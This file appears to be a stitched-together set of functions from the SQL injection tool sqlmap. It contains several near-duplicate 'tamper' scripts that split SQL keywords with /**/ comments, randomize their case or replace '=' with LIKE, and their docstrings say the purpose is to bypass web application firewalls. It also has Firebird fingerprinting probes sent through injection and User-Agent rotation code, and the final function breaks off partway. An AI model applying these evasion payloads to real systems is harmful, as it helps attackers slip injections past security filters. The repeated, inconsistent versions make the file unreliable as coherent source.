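def tamper(payload, **kwargs):
    """
    Add random inline comments inside SQL keywords (e.g. SELECT -> S/**/E/**/LECT)

    Every whole word that is a keyword (``word.upper() in kb.keywords``) and
    at least two characters long gets ``/**/`` between some of its inner
    letters; when the random pass inserts nothing, one comment is forced at a
    random inner position so the keyword never survives intact. The first and
    last characters of a word are never separated from its edges. Other words
    are left untouched.

    :param payload: SQL payload to transform (falsy values are returned unchanged)
    :param kwargs: ignored; accepted for interface compatibility
    :return: the transformed payload string

    >>> import random
    >>> random.seed(0)
    >>> tamper('INSERT')
    'I/**/NS/**/ERT'
    """

    def _comment(match):
        # Rewrite one matched word; non-keywords and single characters pass through.
        word = match.group()

        if len(word) < 2 or word.upper() not in kb.keywords:
            return word

        rebuilt = word[0]

        for i in xrange(1, len(word) - 1):
            rebuilt += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i])

        rebuilt += word[-1]

        # Force at least one comment so the keyword is never emitted intact.
        if "/**/" not in rebuilt:
            index = randomRange(1, len(word) - 1)
            rebuilt = word[:index] + "/**/" + word[index:]

        return rebuilt

    retVal = payload

    if payload:
        # Substitute by match position. A str.replace() over the whole payload
        # also rewrote the same letters inside other identifiers (e.g. the
        # "OR" of "ORDER_ID"), which produced broken SQL.
        retVal = re.sub(r"\b[A-Za-z_]+\b", _comment, payload)

    return retVal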
    def _sysTablesCheck(self):
        """
        Fingerprint the Firebird version from version-specific boolean checks.

        The table lists, per release, expressions the table's author expects
        to hold only from that release on. Releases are probed in ascending
        order with one randomly chosen expression each (every ``%d`` filled
        with the same random integer); probing stops at the first failure.

        :return: highest confirmed version string, or None when even the
                 first check fails
        """
        retVal = None
        table = (
            ("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)", )),
            ("1.5", ("NULLIF(%d,%d) IS NULL",
                     "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")),
            ("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)",
                     "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")),
            ("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d",
                     "FLOOR(1.%d)>=0")),
            # TODO: add test for Firebird 2.5
        )

        for version, checks in table:
            template = checks[randomRange(0, len(checks) - 1)]
            check = template.replace("%d", getUnicode(randomRange(1, 100)))

            # The first failing release ends the scan; all earlier ones held.
            if not inject.checkBooleanExpression(check):
                break

            retVal = version

        return retVal
    def _sysTablesCheck(self):
        """
        Fingerprint the Firebird version from version-specific boolean checks.

        Releases are probed in ascending order with one randomly chosen
        expression each (every ``%d`` filled with the same random integer);
        the scan stops at the first release whose check is not confirmed.

        :return: highest confirmed version string, or None when even the
                 first check fails
        """
        retVal = None
        table = (
                    ("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)",)),
                    ("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")),
                    ("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")),
                    ("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")),
                    # TODO: add test for Firebird 2.5
                 )

        for version, checks in table:
            template = checks[randomRange(0, len(checks) - 1)]
            check = template.replace("%d", getUnicode(randomRange(1, 100)))

            if not inject.checkBooleanExpression(check):
                break

            retVal = version

        return retVal
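def tamper(payload, **kwargs):
    """
    Add random comments to SQL keywords

    Every whole word that is a keyword (``word.upper() in kb.keywords``) and
    at least two characters long gets ``/**/`` between some of its inner
    letters, at least once (one comment is forced when the random pass adds
    none). First and last characters stay at the word edges; other words are
    left untouched.

    :param payload: SQL payload to transform (falsy values are returned unchanged)
    :param kwargs: ignored; accepted for interface compatibility
    :return: the transformed payload string

    >>> import random
    >>> random.seed(0)
    >>> tamper('INSERT')
    'I/**/N/**/SERT'
    """

    def _comment(match):
        # Rewrite one matched word; non-keywords and single characters pass through.
        word = match.group()

        if len(word) < 2 or word.upper() not in kb.keywords:
            return word

        rebuilt = word[0]

        for i in xrange(1, len(word) - 1):
            rebuilt += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i])

        rebuilt += word[-1]

        # Force at least one comment so the keyword is never emitted intact.
        if "/**/" not in rebuilt:
            index = randomRange(1, len(word) - 1)
            rebuilt = word[:index] + "/**/" + word[index:]

        return rebuilt

    retVal = payload

    if payload:
        # Substitute by match position. A str.replace() over the whole payload
        # also rewrote the same letters inside other identifiers (e.g. the
        # "OR" of "ORDER_ID"), which produced broken SQL.
        retVal = re.sub(r"\b[A-Za-z_]+\b", _comment, payload)

    return retVal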
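def tamper(payload, **kwargs):
    """
    Insert a filler string into SQL keywords

    The filler is ``userDefine`` (``%09`` by default; ``/**/`` is another
    common choice). Change the default below, or pass ``userDefine=...``
    through the keyword arguments.

    Pass 1: every whole word that is a keyword (``word.upper() in
    kb.keywords``) and at least two characters long receives the filler
    between some of its inner letters, at least once.
    Pass 2: the lower-case words listed in ``kws`` ("table", "or") get the
    filler in front of their last letter. They are matched as whole words,
    so identifiers such as "order" or "password" are left intact.

    For instance (exact positions depend on the random generator):
    INSERT -> I%09N%09SERT

    :param payload: SQL payload to transform (falsy values are returned unchanged)
    :param kwargs: optional ``userDefine`` filler string
    :return: the transformed payload string
    """

    userDefine = kwargs.get("userDefine", r"%09")  # Change userDefine that you want to insert

    kws = ["table", "or"]

    def _fill(match):
        # Rewrite one matched word; non-keywords and single characters pass through.
        word = match.group()

        if len(word) < 2 or word.upper() not in kb.keywords:
            return word

        rebuilt = word[0]

        for i in xrange(1, len(word) - 1):
            rebuilt += "%s%s" % (userDefine if randomRange(0, 1) else "", word[i])

        rebuilt += word[-1]

        # Force at least one filler so the keyword never survives intact.
        if userDefine not in rebuilt:
            index = randomRange(1, len(word) - 1)
            rebuilt = word[:index] + userDefine + word[index:]

        return rebuilt

    def _fillLast(match):
        # Put the filler right before the last letter of a kws word.
        word = match.group()
        return word[:-1] + userDefine + word[-1:]

    retVal = payload

    if payload:
        # Substitute by match position. A str.replace() over the whole payload
        # also rewrote the same letters inside other identifiers.
        retVal = re.sub(r"\b[A-Za-z_]+\b", _fill, payload)

        # Whole-word match only (bounded by non-letters): the previous
        # substring replace turned e.g. "password" into "passwo%09rd",
        # corrupting the payload.
        kwsPattern = r"(?<![A-Za-z_])(?:%s)(?![A-Za-z_])" % "|".join(re.escape(x) for x in kws)
        retVal = re.sub(kwsPattern, _fillLast, retVal)

    return retVal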
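def __setHTTPUserAgent():
    """
    Set the HTTP User-Agent header.
    Depending on the user options it can be:

        * The default sqlmap string
        * A default value read as user option
        * A random value read from a list of User-Agent headers from a
          file chosen as user option

    The chosen header is appended to ``conf.httpHeaders``. When a file is
    used its entries are cached in ``kb.userAgents`` on first use; an
    unreadable or empty file falls back to the default string with a warning.
    """

    if conf.agent:
        debugMsg = "setting the HTTP User-Agent header"
        logger.debug(debugMsg)

        conf.httpHeaders.append(("User-Agent", conf.agent))
        return

    if not conf.userAgentsFile:
        # Only add the default when no User-Agent is already present in
        # conf.httpHeaders.
        addDefaultUserAgent = all(header != "User-Agent" for header, _ in conf.httpHeaders)

        if addDefaultUserAgent:
            conf.httpHeaders.append(("User-Agent", __defaultHTTPUserAgent()))

        return

    if not kb.userAgents:
        debugMsg = "loading random HTTP User-Agent header(s) from "
        debugMsg += "file '%s'" % conf.userAgentsFile
        logger.debug(debugMsg)

        try:
            kb.userAgents = getFileItems(conf.userAgentsFile)
        except IOError:
            warnMsg = "unable to read HTTP User-Agent header "
            warnMsg += "file '%s'" % conf.userAgentsFile
            logger.warn(warnMsg)

            conf.httpHeaders.append(("User-Agent", __defaultHTTPUserAgent()))

            return

    __count = len(kb.userAgents)

    if __count == 0:
        # A file with no entries used to crash on the random pick below
        # (index range 0..-1); degrade to the default header instead.
        warnMsg = "HTTP User-Agent header file '%s' " % conf.userAgentsFile
        warnMsg += "contains no entries, using default"
        logger.warn(warnMsg)

        conf.httpHeaders.append(("User-Agent", __defaultHTTPUserAgent()))

        return

    if __count == 1:
        __userAgent = kb.userAgents[0]
    else:
        # randomRange() is inclusive at both ends, hence the "- 1".
        __userAgent = kb.userAgents[randomRange(stop=__count - 1)]

    __userAgent = sanitizeStr(__userAgent)
    conf.httpHeaders.append(("User-Agent", __userAgent))

    logMsg = "fetched random HTTP User-Agent header from "
    logMsg += "file '%s': %s" % (conf.userAgentsFile, __userAgent)
    logger.info(logMsg)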
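def tamper(payload):
    """
    Replaces each keyword character with random case value

    Example:
        * Input: INSERT
        * Output: InsERt

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions
        * This tamper script should work against all (?) databases
        * Keywords with at least two letters are re-drawn until the result
          is genuinely mixed case, so a keyword never comes back unchanged

    :param payload: SQL payload to transform (falsy values are returned unchanged)
    :return: the transformed payload string
    """

    def _mixcase(match):
        # Randomize the case of one matched keyword; other words pass through.
        word = match.group()

        if word.upper() not in kb.keywords:
            return word

        # Fewer than two letters can never yield mixed case; leave such
        # words alone rather than loop on them.
        if sum(1 for c in word if c.isalpha()) < 2:
            return word

        while True:
            mixed = "".join(c.upper() if randomRange(0, 1) else c.lower() for c in word)

            # A single draw returned the keyword all-upper or all-lower (and
            # therefore untouched) with probability 2^(1-len); re-draw instead.
            if mixed not in (mixed.lower(), mixed.upper()):
                return mixed

    retVal = payload

    if payload:
        # Substitute by match position. A str.replace() over the whole payload
        # also re-cased the same letters inside other identifiers (e.g. the
        # "OR" of "ORDER_ID") and words that had already been processed.
        retVal = re.sub(r"[A-Za-z_]+", _mixcase, payload)

    return retVal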
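def tamper(payload):
    """
    Add random comments to SQL keywords
    Example: 'INSERT' becomes 'IN/**/S/**/ERT'

    Every word that is a keyword (``word.upper() in kb.keywords``) and at
    least two characters long gets ``/**/`` between some of its inner
    letters, at least once (one comment is forced when the random pass adds
    none). First and last characters stay at the word edges.

    :param payload: SQL payload to transform (falsy values are returned unchanged)
    :return: the transformed payload string
    """

    def _comment(match):
        # Rewrite one matched word; non-keywords and single characters pass through.
        word = match.group()

        if len(word) < 2 or word.upper() not in kb.keywords:
            return word

        rebuilt = word[0]

        for i in xrange(1, len(word) - 1):
            rebuilt += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i])

        rebuilt += word[-1]

        # Force at least one comment so the keyword is never emitted intact
        # (the random pass alone left it untouched with probability 2^-(len-2)).
        if "/**/" not in rebuilt:
            index = randomRange(1, len(word) - 1)
            rebuilt = word[:index] + "/**/" + word[index:]

        return rebuilt

    retVal = payload

    if payload:
        # Substitute by match position. A str.replace() over the whole payload
        # also rewrote the same letters inside other identifiers (e.g. the
        # "OR" of "ORDER_ID"), which produced broken SQL.
        retVal = re.sub(r"[A-Za-z_]+", _comment, payload)

    return retVal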
 def _selectPort(self):
     """
     Prompt for the port of the connection type that prefixes ``self.connectionStr``.

     The first entry of ``self._portData`` whose key is a prefix of the
     connection string is handed to ``_skeletonSelection`` with a 65535 cap
     and a random default in 1025..65535; its result is returned. Nothing
     matching yields None.
     """
     candidates = [connStr for connType, connStr in self._portData.items()
                   if self.connectionStr.startswith(connType)]

     if not candidates:
         return None

     return self._skeletonSelection(candidates[0],
                                    maxValue=65535,
                                    default=randomRange(1025, 65535))
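def tamper(payload, **kwargs):
    """
    Add random comments to SQL keywords

    Every word that is a keyword (``word.upper() in kb.keywords``) and at
    least two characters long gets ``/**/`` between some of its inner
    letters, at least once (one comment is forced when the random pass adds
    none). First and last characters stay at the word edges.

    :param payload: SQL payload to transform (falsy values are returned unchanged)
    :param kwargs: ignored; accepted for interface compatibility
    :return: the transformed payload string

    >>> import random
    >>> random.seed(0)
    >>> tamper('INSERT')
    'I/**/N/**/SERT'
    """

    def _comment(match):
        # Rewrite one matched word; non-keywords and single characters pass through.
        word = match.group()

        if len(word) < 2 or word.upper() not in kb.keywords:
            return word

        rebuilt = word[0]

        for i in xrange(1, len(word) - 1):
            rebuilt += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i])

        rebuilt += word[-1]

        # Force at least one comment so the keyword is never emitted intact
        # (the random pass alone left it untouched with probability 2^-(len-2)).
        if "/**/" not in rebuilt:
            index = randomRange(1, len(word) - 1)
            rebuilt = word[:index] + "/**/" + word[index:]

        return rebuilt

    retVal = payload

    if payload:
        # Substitute by match position. A str.replace() over the whole payload
        # also rewrote the same letters inside other identifiers (e.g. the
        # "OR" of "ORDER_ID"), which produced broken SQL.
        retVal = re.sub(r"[A-Za-z_]+", _comment, payload)

    return retVal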
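def tamper(payload, headers):
    """
    Add random comments to SQL keywords
    Example: 'INSERT' becomes 'IN/**/S/**/ERT'

    Every word that is a keyword (``word.upper() in kb.keywords``) and at
    least two characters long gets ``/**/`` between some of its inner
    letters, at least once (one comment is forced when the random pass adds
    none). First and last characters stay at the word edges.

    :param payload: SQL payload to transform (falsy values are returned unchanged)
    :param headers: request headers; passed back untouched
    :return: ``(transformed payload, headers)``
    """

    def _comment(match):
        # Rewrite one matched word; non-keywords and single characters pass through.
        word = match.group()

        if len(word) < 2 or word.upper() not in kb.keywords:
            return word

        rebuilt = word[0]

        for i in xrange(1, len(word) - 1):
            rebuilt += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i])

        rebuilt += word[-1]

        # Force at least one comment so the keyword is never emitted intact
        # (the random pass alone left it untouched with probability 2^-(len-2)).
        if "/**/" not in rebuilt:
            index = randomRange(1, len(word) - 1)
            rebuilt = word[:index] + "/**/" + word[index:]

        return rebuilt

    retVal = payload

    if payload:
        # Substitute by match position. A str.replace() over the whole payload
        # also rewrote the same letters inside other identifiers (e.g. the
        # "OR" of "ORDER_ID"), which produced broken SQL.
        retVal = re.sub(r"[A-Za-z_]+", _comment, payload)

    return retVal, headers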
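def tamper(payload, **kwargs):
    """
    Combine three transformations on SQL keywords and comparisons:

        1. insert random ``/**/`` comments inside keywords (at least one each)
        2. randomize the letter case of keywords
        3. replace the ``=`` operator with `` LIKE ``

    Step 2 runs on the output of step 1, where keywords are already split by
    comments, so it only re-cases fragments that are keywords by themselves.

    :param payload: SQL payload to transform (falsy values are returned unchanged)
    :param kwargs: ignored; accepted for interface compatibility
    :return: the transformed payload string
    """

    def _comment(match):
        # Step 1 for one matched word; non-keywords and single characters pass through.
        word = match.group()

        if len(word) < 2 or word.upper() not in kb.keywords:
            return word

        rebuilt = word[0]

        for i in xrange(1, len(word) - 1):
            rebuilt += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i])

        rebuilt += word[-1]

        # Force at least one comment so the keyword is never emitted intact.
        if "/**/" not in rebuilt:
            index = randomRange(1, len(word) - 1)
            rebuilt = word[:index] + "/**/" + word[index:]

        return rebuilt

    def _mixcase(match):
        # Step 2 for one matched word; non-keywords pass through.
        word = match.group()

        if word.upper() not in kb.keywords:
            return word

        # Fewer than two letters can never yield mixed case; the old retry
        # loop never terminated on such words, so leave them alone.
        if sum(1 for c in word if c.isalpha()) < 2:
            return word

        while True:
            mixed = "".join(c.upper() if randomRange(0, 1) else c.lower() for c in word)

            # Re-draw until the keyword is genuinely mixed case.
            if mixed not in (mixed.lower(), mixed.upper()):
                return mixed

    retVal = payload

    if payload:
        # Substitute by match position. A str.replace() over the whole payload
        # also rewrote the same letters inside other identifiers (e.g. the
        # "OR" of "ORDER_ID"), which produced broken SQL.
        retVal = re.sub(r"\b[A-Za-z_]+\b", _comment, retVal)
        retVal = re.sub(r"[A-Za-z_]+", _mixcase, retVal)

        # Only a standalone "=" becomes LIKE; the previous pattern also turned
        # "<=", ">=" and "!=" into "< LIKE " etc.
        retVal = re.sub(r"(?<![<>!])\s*=\s*", " LIKE ", retVal)

    return retVal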
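def tamper(payload, **kwargs):
    """
    Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0
        * SQLite 3

    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions
        * This tamper script should work against all (?) databases
        * A word is re-cased when it is a keyword that does not appear quoted
          (`, ", ' or [ ]) anywhere in the payload, or when it is directly
          followed by "(" (a function name). Words with fewer than two
          letters are left alone, since they cannot become mixed case.

    :param payload: SQL payload to transform (falsy values are returned unchanged)
    :param kwargs: ignored; accepted for interface compatibility
    :return: the transformed payload string

    >>> import random
    >>> random.seed(0)
    >>> tamper('INSERT')
    'InSeRt'
    >>> tamper('f()')
    'f()'
    >>> tamper('function()')
    'FuNcTiOn()'
    >>> tamper('SELECT id FROM `user`')
    'SeLeCt id FrOm `user`'
    """

    def _mixcase(match):
        # Decide for one matched word whether to re-case it, then do so.
        word = match.group()

        isKeyword = word.upper() in kb.keywords
        isQuoted = re.search(r"(?i)[`\"'\[]%s[`\"'\]]" % re.escape(word), payload) is not None
        isFunction = ("%s(" % word) in payload

        if not ((isKeyword and not isQuoted) or isFunction):
            return word

        # Fewer than two letters can never yield mixed case; the old retry
        # loop never terminated on such words (e.g. "__("), so skip them.
        if sum(1 for c in word if c.isalpha()) < 2:
            return word

        while True:
            mixed = "".join(c.upper() if randomRange(0, 1) else c.lower() for c in word)

            # Re-draw until the word is genuinely mixed case.
            if mixed not in (mixed.lower(), mixed.upper()):
                return mixed

    retVal = payload

    if payload:
        # Substitute by match position. A str.replace() over the whole payload
        # also re-cased the same letters inside other identifiers (e.g. the
        # "OR" of "ORDER_ID") and words that had already been processed.
        retVal = re.sub(r"\b[A-Za-z_]{2,}\b", _mixcase, payload)

    return retVal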
    def _sysTablesCheck(self):
        """
        Fingerprint the Firebird version from version-specific boolean checks.

        Releases are probed in ascending order with one randomly chosen
        expression each; every ``%d`` is filled with the same random integer
        and every ``%s`` with the same random string. The scan stops at the
        first release whose check is not confirmed.

        :return: highest confirmed version string, or None when even the
                 first check fails
        """
        retVal = None
        table = (
            ("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)", )),
            ("1.5", ("NULLIF(%d,%d) IS NULL",
                     "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")),
            ("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)",
                     "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")),
            ("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d",
                     "FLOOR(1.%d)>=0")),
            (
                "2.5", ("'%s' SIMILAR TO '%s'", )
            ),  # Reference: https://firebirdsql.org/refdocs/langrefupd25-similar-to.html
            (
                "3.0", ("FALSE IS FALSE", )
            ),  # https://www.firebirdsql.org/file/community/conference-2014/pdf/02_fb.2014.whatsnew.30.en.pdf
        )

        for version, checks in table:
            template = checks[randomRange(0, len(checks) - 1)]
            check = template.replace("%d", getUnicode(randomRange(1, 100)))
            check = check.replace("%s", getUnicode(randomStr()))

            if not inject.checkBooleanExpression(check):
                break

            retVal = version

        return retVal
    def __sysTablesCheck(self):
        """
        Fingerprint the Firebird version from version-specific boolean checks.

        Releases are probed in ascending order with one randomly chosen
        "AND ..." fragment each (every ``%d`` filled with the same random
        integer), wrapped by ``agent.fullPayload`` and sent through
        ``Request.queryPage``. The scan stops at the first release whose
        page comparison is not positive.

        :return: highest confirmed version string, or None when even the
                 first check fails
        """
        retVal = None
        table = (
                    ("1.0", ["AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)"]),
                    ("1.5", ["AND NULLIF(%d,%d) IS NULL", "AND EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)"]),
                    ("2.0", ["AND EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "AND BIT_LENGTH(%d)>0", "AND CHAR_LENGTH(%d)>0"]),
                    ("2.1", ["AND BIN_XOR(%d,%d)=0", "AND PI()>0.%d", "AND RAND()<1.%d", "AND FLOOR(1.%d)>=0"])
                 )

        for version, checks in table:
            template = checks[randomRange(0, len(checks) - 1)]
            check = template.replace("%d", getUnicode(randomRange(1, 100)))
            payload = agent.fullPayload(check)

            if not Request.queryPage(payload):
                break

            retVal = version

        return retVal
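def tamper(payload, **kwargs):
    """
    Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0
        * SQLite 3

    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions
        * This tamper script should work against all (?) databases
        * A word is re-cased when it is a keyword or is directly followed by
          "(" (a function name). Words with fewer than two letters are left
          alone: they cannot become mixed case, and the previous retry loop
          never terminated on them (``tamper('f()')`` hung).

    :param payload: SQL payload to transform (falsy values are returned unchanged)
    :param kwargs: ignored; accepted for interface compatibility
    :return: the transformed payload string

    >>> import random
    >>> random.seed(0)
    >>> tamper('INSERT')
    'INseRt'
    """

    def _mixcase(match):
        # Decide for one matched word whether to re-case it, then do so.
        word = match.group()

        if not (word.upper() in kb.keywords or ("%s(" % word) in payload):
            return word

        # Guard against the non-terminating retry for single-letter words.
        if sum(1 for c in word if c.isalpha()) < 2:
            return word

        while True:
            mixed = "".join(c.upper() if randomRange(0, 1) else c.lower() for c in word)

            # Re-draw until the word is genuinely mixed case.
            if mixed not in (mixed.lower(), mixed.upper()):
                return mixed

    retVal = payload

    if payload:
        # Substitute by match position. A str.replace() over the whole payload
        # also re-cased the same letters inside other identifiers (e.g. the
        # "OR" of "ORDER_ID") and words that had already been processed.
        retVal = re.sub(r"\b[A-Za-z_]+\b", _mixcase, payload)

    return retVal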
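def tamper(payload, **kwargs):
    """
    Replaces each keyword character with random case value

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions
        * This tamper script should work against all (?) databases
        * Keywords with fewer than two letters are left alone: they cannot
          become mixed case, so the retry loop could never finish on them

    :param payload: SQL payload to transform (falsy values are returned unchanged)
    :param kwargs: ignored; accepted for interface compatibility
    :return: the transformed payload string

    >>> import random
    >>> random.seed(0)
    >>> tamper('INSERT')
    'INseRt'
    """

    def _mixcase(match):
        # Randomize the case of one matched keyword; other words pass through.
        word = match.group()

        if word.upper() not in kb.keywords:
            return word

        # Guard against the non-terminating retry for words with < 2 letters.
        if sum(1 for c in word if c.isalpha()) < 2:
            return word

        while True:
            mixed = "".join(c.upper() if randomRange(0, 1) else c.lower() for c in word)

            # Re-draw until the keyword is genuinely mixed case.
            if mixed not in (mixed.lower(), mixed.upper()):
                return mixed

    retVal = payload

    if payload:
        # Substitute by match position. A str.replace() over the whole payload
        # also re-cased the same letters inside other identifiers (e.g. the
        # "OR" of "ORDER_ID") and words that had already been processed.
        retVal = re.sub(r"\b[A-Za-z_]+\b", _mixcase, payload)

    return retVal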
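def tamper(payload):
    """
    Replaces each character with random case value
    Example: 'INSERT' might become 'InsERt'

    Only words that are keywords (``word.upper() in kb.keywords``) are
    touched. Keywords with at least two letters are re-drawn until the
    result is genuinely mixed case, so a keyword never comes back unchanged.

    :param payload: SQL payload to transform (falsy values are returned unchanged)
    :return: the transformed payload string
    """

    def _mixcase(match):
        # Randomize the case of one matched keyword; other words pass through.
        word = match.group()

        if word.upper() not in kb.keywords:
            return word

        # Fewer than two letters can never yield mixed case; leave such
        # words alone rather than loop on them.
        if sum(1 for c in word if c.isalpha()) < 2:
            return word

        while True:
            mixed = "".join(c.upper() if randomRange(0, 1) else c.lower() for c in word)

            # A single draw returned the keyword all-upper or all-lower (and
            # therefore untouched) with probability 2^(1-len); re-draw instead.
            if mixed not in (mixed.lower(), mixed.upper()):
                return mixed

    retVal = payload

    if payload:
        # Substitute by match position. A str.replace() over the whole payload
        # also re-cased the same letters inside other identifiers (e.g. the
        # "OR" of "ORDER_ID") and words that had already been processed.
        retVal = re.sub(r"[A-Za-z_]+", _mixcase, payload)

    return retVal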
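def tamper(payload):
    """
    Replaces each character with random case value
    Example: 'INSERT' might become 'InsERt'

    Only words that are keywords (``word.upper() in kb.keywords``) are
    touched. Keywords with at least two letters are re-drawn until the
    result is genuinely mixed case, so a keyword never comes back unchanged.

    :param payload: SQL payload to transform (falsy values are returned unchanged)
    :return: the transformed payload string
    """

    def _mixcase(match):
        # Randomize the case of one matched keyword; other words pass through.
        word = match.group()

        if word.upper() not in kb.keywords:
            return word

        # Fewer than two letters can never yield mixed case; leave such
        # words alone rather than loop on them.
        if sum(1 for c in word if c.isalpha()) < 2:
            return word

        while True:
            mixed = "".join(c.upper() if randomRange(0, 1) else c.lower() for c in word)

            # A single draw returned the keyword all-upper or all-lower (and
            # therefore untouched) with probability 2^(1-len); re-draw instead.
            if mixed not in (mixed.lower(), mixed.upper()):
                return mixed

    retVal = payload

    if payload:
        # Substitute by match position. A str.replace() over the whole payload
        # also re-cased the same letters inside other identifiers (e.g. the
        # "OR" of "ORDER_ID") and words that had already been processed.
        retVal = re.sub(r"[A-Za-z_]+", _mixcase, payload)

    return retVal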
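def tamper(payload, headers=None):
    """
    Replaces each keyword character with random case value

    Example:
        * Input: INSERT
        * Output: InsERt

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions
        * This tamper script should work against all (?) databases
        * Keywords with at least two letters are re-drawn until the result
          is genuinely mixed case, so a keyword never comes back unchanged

    :param payload: SQL payload to transform (falsy values are returned unchanged)
    :param headers: unused; accepted for interface compatibility
    :return: the transformed payload string
    """

    def _mixcase(match):
        # Randomize the case of one matched keyword; other words pass through.
        word = match.group()

        if word.upper() not in kb.keywords:
            return word

        # Fewer than two letters can never yield mixed case; leave such
        # words alone rather than loop on them.
        if sum(1 for c in word if c.isalpha()) < 2:
            return word

        while True:
            mixed = "".join(c.upper() if randomRange(0, 1) else c.lower() for c in word)

            # A single draw returned the keyword all-upper or all-lower (and
            # therefore untouched) with probability 2^(1-len); re-draw instead.
            if mixed not in (mixed.lower(), mixed.upper()):
                return mixed

    retVal = payload

    if payload:
        # Substitute by match position. A str.replace() over the whole payload
        # also re-cased the same letters inside other identifiers (e.g. the
        # "OR" of "ORDER_ID") and words that had already been processed.
        retVal = re.sub(r"[A-Za-z_]+", _mixcase, payload)

    return retVal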
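def __setHTTPUserAgent():
    """
    Set the HTTP User-Agent header.
    Depending on the user options it can be:

        * The default sqlmap string
        * A default value read as user option
        * A random value read from a list of User-Agent headers from a
          file chosen as user option

    The chosen header is appended to ``conf.httpHeaders``. An unreadable or
    empty file falls back to the default string with a warning.
    """

    if conf.agent:
        debugMsg = "setting the HTTP User-Agent header"
        logger.debug(debugMsg)

        conf.httpHeaders.append(("User-Agent", conf.agent))
        return

    if not conf.userAgentsFile:
        conf.httpHeaders.append(("User-Agent", __defaultHTTPUserAgent()))
        return

    debugMsg = "fetching random HTTP User-Agent header from "
    debugMsg += "file '%s'" % conf.userAgentsFile
    logger.debug(debugMsg)

    try:
        fd = open(conf.userAgentsFile, "r")
    except IOError:
        warnMsg = "unable to read HTTP User-Agent header "
        warnMsg += "file '%s'" % conf.userAgentsFile
        logger.warn(warnMsg)

        conf.httpHeaders.append(("User-Agent", __defaultHTTPUserAgent()))

        return

    # One candidate per line; blank lines (e.g. a trailing newline) would
    # otherwise become an empty User-Agent value. The "with" closes the file
    # even if reading fails.
    with fd:
        __userAgents = [line for line in fd if line.strip()]

    __count = len(__userAgents)

    if __count == 0:
        warnMsg = "HTTP User-Agent header file '%s' " % conf.userAgentsFile
        warnMsg += "contains no entries, using default"
        logger.warn(warnMsg)

        conf.httpHeaders.append(("User-Agent", __defaultHTTPUserAgent()))

        return

    if __count == 1:
        __userAgent = __userAgents[0]
    else:
        # randomRange() is inclusive at both ends (its other call sites use
        # ``len(...) - 1``), so ``stop=__count`` could index past the list.
        __userAgent = __userAgents[randomRange(stop=__count - 1)]

    __userAgent = sanitizeStr(__userAgent)
    conf.httpHeaders.append(("User-Agent", __userAgent))

    logMsg = "fetched random HTTP User-Agent header from "
    logMsg += "file '%s': %s" % (conf.userAgentsFile, __userAgent)
    logger.info(logMsg)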
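def __setHTTPUserAgent():
    """
    Set the HTTP User-Agent header.
    Depending on the user options it can be:

        * The default sqlmap string
        * A default value read as user option
        * A random value read from a list of User-Agent headers from a
          file chosen as user option

    The chosen header is appended to ``conf.httpHeaders``. An unreadable or
    empty file falls back to the default string with a warning.
    """

    if conf.agent:
        debugMsg = "setting the HTTP User-Agent header"
        logger.debug(debugMsg)

        conf.httpHeaders.append(("User-Agent", conf.agent))
        return

    if not conf.userAgentsFile:
        conf.httpHeaders.append(("User-Agent", __defaultHTTPUserAgent()))
        return

    debugMsg  = "fetching random HTTP User-Agent header from "
    debugMsg += "file '%s'" % conf.userAgentsFile
    logger.debug(debugMsg)

    try:
        fd = open(conf.userAgentsFile, "r")
    except IOError:
        warnMsg  = "unable to read HTTP User-Agent header "
        warnMsg += "file '%s'" % conf.userAgentsFile
        logger.warn(warnMsg)

        conf.httpHeaders.append(("User-Agent", __defaultHTTPUserAgent()))

        return

    # One candidate per line; blank lines (e.g. a trailing newline) would
    # otherwise become an empty User-Agent value. The "with" closes the file
    # even if reading fails.
    with fd:
        __userAgents = [line for line in fd if line.strip()]

    __count = len(__userAgents)

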